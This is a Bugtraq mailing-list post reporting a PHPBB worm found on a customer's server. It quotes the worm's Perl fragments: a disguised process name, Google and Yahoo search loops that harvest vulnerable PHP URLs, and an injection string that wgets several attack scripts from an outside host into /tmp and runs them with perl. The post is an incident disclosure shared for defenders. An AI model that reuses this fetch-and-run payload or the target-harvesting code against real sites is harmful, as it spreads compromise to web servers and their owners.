PHPBB worm in action

[Colin Keith <bugtraq () ckeith clara net>]

Hello,

I discovered tonight that a copy of the PHPBB worm had broken in through
a script a customer was running and was busy running around googling and
generating lists of sites. There have been a couple of intrusions but
they appear to be the same version. I thought I'd pass on the files that
were on the server in case anyone is interested.

The processes that were left running were called:

 /usr/local/sbin/httpd - spy

which is the process name from php.txt:

 my $processo = "/usr/local/sbin/httpd - spy";

This file contains the component that talks to Google:

 $procura = 'inurl:*.php?*=' . $numr;
 for($n=0;$n<900;$n += 10){
 $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
 print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";


and then parses the results for URLs :)

It also gets them from Yahoo!:

 for($cadenu=1;$cadenu <= 991; $cadenu +=10){
 @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu";)
 or next;


The basis for all of these worms is:

 $lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget 
www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget 
www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';


I've included copies of these in the tarball so people can look for
themselves :)

Happy holidays.
Colin.





--
If jugglers juggle.
And Smugglers smuggle.
Then what else can a snuggler do :)

Attachment: phpbbworm.tar.gz
Description: